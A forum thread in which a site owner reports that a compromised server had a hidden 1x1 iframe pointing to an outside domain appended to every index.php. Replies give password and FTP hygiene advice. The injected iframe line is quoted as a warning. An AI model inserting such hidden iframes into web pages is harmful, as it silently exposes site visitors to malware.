Server hacked and malware code appended to each index.php

Our server (not shared) has just been hacked by someone adding the following code to the end of every index.php rendering each page either erroneous or throwing up a Google 'malware' error. Please take steps to secure your servers in the tightest way possible:

<html><body><iframe src="http://bali-planet.com/" width="1" height="1" frameborder="0"></iframe></body></html>

Caution should also be exercised when giving developers FTP access as, even if unintetionally, their system may be infected with malware. Delete their access account immediately after work is complete and make sure to change your access password regularly.

Yes not along with this :)

Quite often this comes from malware on your own computer that infects ftp transfer programs,  It's possible you hacked your own site.

Everything is possible although the systems here are scanned at all times. I'm simply offering a warning to newbies who might otherwise have thought nothing of giving cPanel access or full FTP access to their site/server. The attack was of Russian origin.

Guys I am being hacked all the time in the last few days can someone please help me. I feel like I am trying ot patch a leaking dam wall.

You should scan your computer for any malware, as well as change all your hosting-related passwords (including FTP and account panel, etc.). You should also use passwords which are randomly generated, to avoid your server being compromised due to a lucky guess. Ask your hosting provider to help you with anything on their end, such as scanning for infected files.

The last time it happened it was traced to Boonex.  They didn't hack the site of course, but one of them had malware on their computer that spread the FTP password.   I was one of the first to get hit - they acknowledged it - sort of, and I assume took some precautions.

Never store passwords in FTP manager. Trojans first thing in trying to connect to the stored sites. Change the frequently FTP access